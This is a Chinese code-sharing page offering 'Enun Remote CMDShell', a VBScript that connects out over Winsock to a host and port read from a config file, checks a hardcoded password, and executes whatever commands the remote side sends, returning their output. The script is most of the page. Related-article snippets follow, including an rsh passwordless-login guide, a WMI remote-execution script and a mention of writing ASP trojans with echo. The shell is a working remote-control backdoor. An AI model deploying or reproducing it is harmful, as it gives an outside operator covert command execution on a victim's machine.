VBScript Enun Remote CMD Shell代码

效果如图:

代码如下:

'============================
' Enun Remote CMDShell v 1.0
'============================

Option Explicit

CONST ACCOUNT_LOCK_TIME = 600000    '账户锁定时间,10分钟
CONST LOCKOUT_BAD_COUNT = 3     '密码失败次数
CONST DEFAULT_WAIT_TIME = 1000     '默认延时,1秒
CONST DEFAULT_TIME_OUT  = 60000    '默认超时,60秒

Public WinSocket, sRevData, Count
Do
 On Error Resume Next

Do While (WinSocket.State <> 7)
  Dim ObjectFSO, GetConfig, Line, Host, Port, i

Set WinSocket = WScript.CreateObject("MSWinsock.Winsock")
  Set ObjectFSO = CreateObject("Scripting.FileSystemObject")
  Set GetConfig = ObjectFSO.OpenTextFile(".\enunrc.ini", 1)

For i = 1 To 3
   Line = GetConfig.ReadLine
   If InStr(Line,"Host") > 0 Then Host = Split(Line, "=", -1, 1)(1)
   If InStr(Line,"Port") > 0 Then Port = Split(Line, "=", -1, 1)(1)
  Next

If (Len(Host) = 0) Then Host = "127.0.0.1"
  If (Len(Port) = 0) Then Port = "8090"

WinSocket.Protocol = 0
  WinSocket.RemoteHost = Host
  WinSocket.RemotePort = Port
  WinSocket.Connect

WScript.Sleep DEFAULT_WAIT_TIME * 5
  Call TrackScript(2, WinSocket.State, WinSocket.BytesReceived)
  'Setp: 2
 Loop

Do While (WinSocket.State <> 9 and WinSocket.State <> 0)

Dim AuthKey, LockoutBadCount, TIMEOUT_M, TIMEOUT_N

TIMEOUT_N = 0

WinSocket.SendData WinSocket.LocalHostName & " is Connected, Enter Password: "
  Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)
   TIMEOUT_N = TIMEOUT_N + 1000

Call ControlTimeout(TIMEOUT_N)
  Loop

WinSocket.GetData Authkey, vbString
  If Split(Authkey, chr(10), -1, 1)(0) = "veteran" Then
   WinSocket.SendData "Logon Success, Welcome!" & vbcrlf

sRevData = "veteran"

Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)
    Dim ShellObj, Executes

Set ShellObj = CreateObject("WScript.Shell")
    Set Executes = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))

WinSocket.SendData Executes.StdOut.ReadAll
    WinSocket.SendData Executes.StdErr.ReadAll

If (Len(sRevData) > 0) Then
     TIMEOUT_M = 0
     WinSocket.SendData vbcrlf & "[" & WinSocket.LocalHostName & "@enun]#: "
    Else
     Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)
      TIMEOUT_M = TIMEOUT_M + 1000
      Call ControlTimeout(TIMEOUT_M)
     Loop
    End If

If (LCase(Left(sRevData, 4)) = "exit") Then WinSocket.Close

WinSocket.GetData sRevData, vbString

WScript.Sleep DEFAULT_WAIT_TIME
    Call TrackScript(5, WinSocket.State, WinSocket.BytesReceived)
    'Setp: 5
   Loop
  Else
   LockoutBadCount = LockoutBadCount + 1
   WinSocket.SendData "Logon fail: Unknown user name or bad password." & vbcrlf
   WScript.Sleep DEFAULT_WAIT_TIME
  End If

If (LockoutBadCount = LOCKOUT_BAD_COUNT) Then
   WinSocket.SendData "Failed too many times, the account has been locked!" & vbcrlf
   WScript.Sleep DEFAULT_WAIT_TIME
   WinSocket.Close

LockoutBadCount = 0
   WScript.Sleep ACCOUNT_LOCK_TIME
   '锁定账户
  End If
  Call TrackScript(3, WinSocket.State, WinSocket.BytesReceived)
  'Setp: 3
 Loop
 Call TrackScript(1, WinSocket.State, WinSocket.BytesReceived)
 'Setp: 1
Loop

'=======================
'Control Timeout.
'=======================
Public Sub ControlTimeout(Count)
 If Count = DEFAULT_TIME_OUT Then
  WinSocket.SendData vbcrlf & "Local server response timeout, Please reconnect ..." & vbcrlf
  WScript.Sleep DEFAULT_WAIT_TIME
  WinSocket.Close
  '控制端60秒内无输入的话,连接自动断开,可即时连接。
 Else
  WScript.Sleep DEFAULT_WAIT_TIME
 End If
 Call TrackScript(4, WinSocket.State, WinSocket.BytesReceived)
 'Setp: 4
End Sub

'=======================
'Track Script.
'=======================
Public Sub TrackScript(MyStep, StateCode, BytesReceived)
 WScript.echo "MyStep: " & MyStep & ", StateCode: " & StateCode & ", Received: " & BytesReceived & " Bytes"
End Sub

(0)

相关推荐

  • Ubuntu下安装rsh实现无密码访问详解

    一.环境 1.三台服务器ubuntu14.04, 主机名分别为compute,block1和blcok2 2.两台主机hosts文件都为: root@compute:~# cat /etc/hosts 127.0.0.1 localhost 192.168.4.132 compute 192.168.4.133 block1 192.168.4.134 block2 二.安装rsh和rsh-server(三台主机都安装),并设置启动rsh和rlogin服务 1 安装 apt-get instal

  • 用Shell脚本快速搭建Ubuntu下的Nodejs开发环境

    nodejs的确是很火,以前倒腾过,但是从来没有认真记录下什么.在ubuntu下搭建它的开发环境尝尝鲜,有一个捷径,它能让系统自动帮你安装所需要的东西,我们生成一段shell脚本,让它来完成以下工作: 安装 git下最新的node,node包管理器,Forever和Cloud9IDE工具(可选),mongodb 10gen:注:脚本的正常运行需要比较新版本的Ubuntu,而且需要联网,因为它会连接网络去下载所有的依赖包顺序安装. 1.脚本代码: 复制代码 代码如下: #!/bin/shecho

  • Shell脚本实现自动检测修改最快的Ubuntu软件源

    每次装好Ubuntu,对于大多数用户来说,首先要做的事就是手动修改/etc/apt/sources.list文件,将里面的官方软件源地址更换为自己学校或者公司的软件源.当我们更换一个工作环境后,可能伴随着又要替换旧的软件源地址. 笔者觉得这样每次手动更改软件源是一件及其麻烦重复的劳动,于是编写了一个自动更新最快软件源的脚本,从此一劳永逸. 原理 最直观的想法就是:对各个软件源进行测速,选出最快的那个,之后将其替换为新的软件源. 那么如何对各个软件源测速呢?有两种方法: 一.用ping命令 测量其

  • 获取服务器信息的Shell脚本分享(ubuntu、centos测试通过)

    此脚本已经在ubuntu以及centos版本上测试通过,脚本如下: 复制代码 代码如下: #!/bin/bash Line='===========' #linux发行版名称 if [[ -f /usr/bin/lsb_release ]]; then OS=$(/usr/bin/lsb_release -a |grep Description |awk -F : '{print $2}' |sed 's/^[ \t]*//g') else OS=$(cat /etc/issue |sed -n

  • VBScript Enun Remote CMD Shell代码

    效果如图: 复制代码 代码如下: '============================' Enun Remote CMDShell v 1.0'============================ Option Explicit CONST ACCOUNT_LOCK_TIME = 600000    '账户锁定时间,10分钟CONST LOCKOUT_BAD_COUNT = 3     '密码失败次数CONST DEFAULT_WAIT_TIME = 1000     '默认延时,1秒

  • python os.system执行cmd指令代码详解

    1.执行cmd指令,在cmd输出的内容会直接在控制台输出,返回结果为0表示执行成功. 2.在调用完shell脚本后,返回一个16位的二进制数,低位为杀死所调用脚本的信号号码,高位为脚本的退出状态码. os.system()方法是简单粗暴的执行cmd指令,没有办法获取到cmd输出的内容. 实例 # coding:utf-8 import os os.system("ls") Python如何使用OS模块调用cmd 在os模块中提供了两种调用 cmd 的方法,os.popen() 和 os

  • Do All in Cmd Shell一切在命令行下完成第1/6页

    文件传输 对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件.由于蠕虫病毒流行,连接ipc$所需要的139或445端口被路由封锁.再加上WinXP系统加强了对ipc$的保护,通过ipc$及默认共享上传文件的手段基本无效了.ftp和tftp是两种可行的方法,介于其已被大家熟知,本文就不介绍了.还有三种大家熟悉的办法,作为总结我再提一下: 1,用Echo命令写ASP木马. 前提当然是目标主机上已经安装了IIS. 一般的ASP木马"体积"较大,不适合直接用echo命令写入文件,

  • ubuntu与centos中更换ip的shell代码

    代码一ubuntu与centos 复制代码 代码如下: ubuntu:#!/bin/bashecho "ipaddr:"read lineecho $linesed "s/address.*$/address=${line}/g" /etc/network/interfacescentos(未测试):#!/bin/bashecho "ipaddr:"read lineecho $linesed "s/IPADDR.*$/IPADDR=$

  • VBScript 动态 Array 的实现代码

    记录一个小方法,关于 VBScript 中,动态 Array 的实现,也适用于 VBA, 在很久以前,写 VBA 的时候,就觉得使用 Array 和不方便,因为大小固定, 当时想的是,要是 Array 可以像 Python 里的 list 一样好用该多好啊, 那么下面,就记录一个方法,能让 Array 变得动态,并且好用! 实现方法: 在下面的实例中,先设定一个空的 Array 出来, 然后用,下面的方法实现动态 Array, 并且,把数字 1 到 10,一个加到 Array 中去. '动态 A

  • Python调用shell cmd方法代码示例解析

    1.使用os.system()去调用,但是只能返回执行状态,不能获取shell cmd执行结果 #!/usr/bin/python # -*- coding: utf-8 import os status = os.system("ps aux |grep Xcode |grep -v grep") print status 2.使用os.popen执行并获取结果 ​ 如果返回是str,直接通过read拿结果使用,如果是多行,选择readlines转list获取每行内容 #整份字符串处

  • vbscript include的办法实现代码第1/2页

    任何真正实用的工程开发都必然是多文件的.但是VBScript创建多文件工程要麻烦一点,它对多文件工程,代码复用的支持并不是太好.在C/C++工程里,我们已经习惯了通过一个include语句,并且声明一个函数原形的方式来使用其它模块中的函数,这样一个复杂的工程可以比较容易地分解成一些小的模块,以更容易理解和掌握.VBScript中情况有些不同.这与它的设计目标有关.最初VBScript是用在客户端脚本,以支持与客户端作简单的交互,如简单的输入检查等等.在浏览器里显然没有办法支持对另一个文件中的函数

  • Rcmd.vbs [Remote Cmd with wmi]远程脚本

    复制代码 代码如下: On Error Resume Next Set outstreem=Wscript.stdout If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then Set objShell=Wscript.CreateObject("Wscript.shell") objShell.Run("cmd.exe /k cscript //nologo "&Chr(34)

  • vbscript ms owc 封裝代码

    复制代码 代码如下: ''owc.vbs class owc private o '传入物件 public property set set_obj(o_id) set o=o_id end property '画图矩形图 'chart_bgcolor_图表的背景颜色 'chartCaption_图表的标题 'chartCaption_fontColor_图表标题颜色 'Interior_Color_矩形内的填充颜色 'Caption_名称 'categories_名称数组 'values_值数

  • Microsoft VBScript 编译器错误 错误原因 代码大全

    Microsoft VBScript 编译器错误 错误 '' 缺少语句 ActiveServerPages,ASP0126(0x80004005)-->找不到包含文件 MicrosoftOLEDBProviderforODBCDrivers(0x80040E21)-->sql语句出错(数据类型不匹配或表名(字段名)错误或表处于编辑状态,或表不存在于conn打开的数据库中) MicrosoftOLEDBProviderforODBCDrivers(0x80040E14)-->sql语句出错

随机推荐